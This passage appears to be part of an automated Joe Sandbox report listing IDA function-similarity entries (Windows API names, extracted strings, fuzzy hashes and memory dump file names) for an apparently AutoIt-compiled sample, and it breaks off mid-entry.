                                                                      • Instruction ID: 5b66440bdc868b84f90cb17a74a76494edc2740bc8a7ba78343ab72f8eceb35f
                                                                      • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                      • Instruction Fuzzy Hash: A171C312A8C2C155FB35BF3090502BAAB60EB45B98FD80079D68D43381CF5EFA4AC7B1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerTypewcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 1561581874-1000479233
                                                                      • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                      • Instruction ID: 9cdaf258d5070a7b0792e155f51076d383e52a8b8c1679822ee8be3f3e88740e
                                                                      • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                      • Instruction Fuzzy Hash: 93D1D662A4C79642EA20BF15D55017AE3A0FBA4BF4F884232DA5D937D4DF3CF94583A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                      • String ID: %s%u
                                                                      • API String ID: 1412819556-679674701
                                                                      • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                      • Instruction ID: a9d641d74f8bc53e61938666fb272c898e48e6f6ca019c166dda91849815bf88
                                                                      • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                      • Instruction Fuzzy Hash: 27B1EF72B0968296EB19FF25D8086F9A760FB44B94F800031DE1987796DF3EF554C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 4010642439-1241985126
                                                                      • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                      • Instruction ID: dcd1273d4198d862dde896970026ecb2b08dcb04ce0c562fd950e2f34a3a1d78
                                                                      • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                      • Instruction Fuzzy Hash: 27A1A633A4C64243EA28BF15D4446B9E761FB85BA4F844035CA8E83B95DF3EF545CB90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID: P
                                                                      • API String ID: 1268354404-3110715001
                                                                      • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                      • Instruction ID: 391912b782e34e5c133d3c456d66f0f122831bba56694bdb9658cc847aed79ea
                                                                      • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                      • Instruction Fuzzy Hash: 13618235A48A418AEB54FF65D8406B9A7A0FB84FB8F944535EE0E83794DF3CF4848790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 3297454147-2391861430
                                                                      • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                      • Instruction ID: 4544d15b686756d4518f03dc2f1402aea5b25ae06011bbe0e21c90396bacff9c
                                                                      • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                      • Instruction Fuzzy Hash: 73715E22A6CA5292EB40FF61E4404EDA360FB44764FC01432EA5D87799DF7CF546C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 3030280669-22481851
                                                                      • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                      • Instruction ID: 5e5eb5af7367aabd767edc062ca8ae1ae71a1f35caa74c15b00410592e2e9513
                                                                      • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                      • Instruction Fuzzy Hash: FC51B722618E8295EB10FF65E4941EDA760FB847A4F800031EE4D87BB5DF7CE585C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                      • String ID: static
                                                                      • API String ID: 3821898125-2160076837
                                                                      • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                      • Instruction ID: fedfc104954f119655469c82b937aacd7609d917a5a946f68445b11c53cdc417
                                                                      • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                      • Instruction Fuzzy Hash: 0441613260C781CBE760AF25E44475AB361FB88BA4F904235DA9D87B98CF3CE484CB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                      • Instruction ID: 4145332ed9c41f73a89c131483255f3d992f6cb55c09cc7ec56b460ff46b3b2f
                                                                      • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                      • Instruction Fuzzy Hash: B261B122B0865286FB00FF61D8445AD77A4FB44BA8F844136DE4E93795DF38E885C3E4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                      • Instruction ID: e2313a6b7a3da8bdbc8fb73854c277005cf53a37ee9992bb5f85eae3837a2c1b
                                                                      • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                      • Instruction Fuzzy Hash: 96414F21E4C7C256FB71BF619400779EA90BB15B64F888039D6CA837C1CF5EBA9483B1
                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E56838: CreateFileW.KERNELBASE ref: 00007FF7C0E568A2
                                                                        • Part of subcall function 00007FF7C0E74380: GetCurrentDirectoryW.KERNEL32(?,00007FF7C0E5E817), ref: 00007FF7C0E7439C
                                                                        • Part of subcall function 00007FF7C0E556D4: GetFullPathNameW.KERNEL32(?,00007FF7C0E556C1,?,00007FF7C0E57A0C,?,?,?,00007FF7C0E5109E), ref: 00007FF7C0E556FF
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7C0E5E8B0
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7C0E5E9FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 2207129308-1018226102
                                                                      • Opcode ID: aaab2590e2c55f620f3c197b1437531a6294d3c91516e62f4c10d2dd04024f34
                                                                      • Instruction ID: e90cf4325942daa74583732636e3b4bc2dd92705a67ebd673b3dfc32647b5a6f
                                                                      • Opcode Fuzzy Hash: aaab2590e2c55f620f3c197b1437531a6294d3c91516e62f4c10d2dd04024f34
                                                                      • Instruction Fuzzy Hash: FD129F22A5CA5286EB10FF25D4401BEA760FB847A4FC40532EA8D8779ADF7CF545C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 636576611-1287834457
                                                                      • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                      • Instruction ID: 265b7c21de5a6002b058a80f802cff86ae25a6eb577a3aba8d82cf69c066d34e
                                                                      • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                      • Instruction Fuzzy Hash: 78715022A48A4A85EB14BF26D4401BDA764FF44BE8F945432DE1E87765DF3CF885C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                      • String ID: 5$Ping
                                                                      • API String ID: 1486594354-1972892582
                                                                      • Opcode ID: bb2382a12e0c24691fe7b3e346173c7f34f853a6c0b3323caf9ace7604140cef
                                                                      • Instruction ID: 6ae053dbec67af3f32cf0289972748f06835c120d3be2d909926b541fa059c67
                                                                      • Opcode Fuzzy Hash: bb2382a12e0c24691fe7b3e346173c7f34f853a6c0b3323caf9ace7604140cef
                                                                      • Instruction Fuzzy Hash: F4716D62A48A4682EB20FF25D48437DB760FF84BA4F918535DB5E87392CF7CE44187A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                      • API String ID: 3215553584-2617248754
                                                                      • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                      • Instruction ID: 028b8c2d3e3ee82cc362670cde039d909f0b79ba32e9f3c4a96772747dfa9e02
                                                                      • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                      • Instruction Fuzzy Hash: A2418F32A09B85C9FB54EF25E8517A973A4FB043A8F804236EE5C87B55DF38E065C390
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                      • Instruction ID: 9a91289dfc9d6683689d60db16af5319e58c7951be215018a0798418de794dec
                                                                      • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                      • Instruction Fuzzy Hash: 94415C37A48B1295EB10BF25D4801BCA771FB88BA8F885532DA0D83755EF78F585C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleStringwprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 4007322891-4153970271
                                                                      • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                      • Instruction ID: 8e415bbbfea756217fd68597fd6a4068f72c6161a30724911ebebc51d2491d1e
                                                                      • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                      • Instruction Fuzzy Hash: 5F316232A5CE8691EB10FF21E4445ADA361FB44BA4FC44032EA8D83799DF7CE645C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2573188126-1403004172
                                                                      • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                      • Instruction ID: 377144f7a23d6feacbc53841069464327688ce50cb370a94a6c01ed2c78821b0
                                                                      • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                      • Instruction Fuzzy Hash: 0E31B031A0DA8182EB10BF15E9541B9E361BF88FB0F844131DE9D83795DF2CF54587A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2573188126-1403004172
                                                                      • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                      • Instruction ID: 7e4ca0f27cfbec2301590a491ccda0d6efc8c6875282afe7c370d8c991ca519f
                                                                      • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                      • Instruction Fuzzy Hash: 1631AF31A0DA8182EB10BF15E8141B9E361BF89FB0F844232DEAD877D5DF2CE54587A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
